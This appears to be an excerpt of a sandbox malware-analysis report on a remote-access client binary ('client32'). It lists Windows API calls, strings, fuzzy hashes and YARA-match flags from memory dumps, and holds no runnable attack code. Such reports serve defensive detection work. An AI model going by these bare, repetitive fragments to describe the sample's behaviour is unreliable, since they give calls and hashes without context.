                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2046328329-2830328467
                                                                              • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                              • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                              APIs
                                                                              • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                              • m_hWnd, xrefs: 11001066
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 819365019-2830328467
                                                                              • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                              • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                              APIs
                                                                              • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                              • m_hWnd, xrefs: 110010F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 906220102-2830328467
                                                                              • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                              • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 110151B6
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                              • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 11017206
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                              • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                              APIs
                                                                              • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                              • m_hWnd, xrefs: 11001136
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1604732272-2830328467
                                                                              • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                              • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                              APIs
                                                                              • KillTimer.USER32(?,?), ref: 1100102B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                              • m_hWnd, xrefs: 11001016
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              APIs
                                                                              • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                              • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoadVersion
                                                                              • String ID: AudioCapture.dll
                                                                              APIs
                                                                              • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                              • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindMessageSendWindow
                                                                              • String ID: MSOfficeWClass
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                              APIs
                                                                              • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                              • m_hWnd, xrefs: 1101D3A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MenuProp
                                                                              • String ID: OldMenu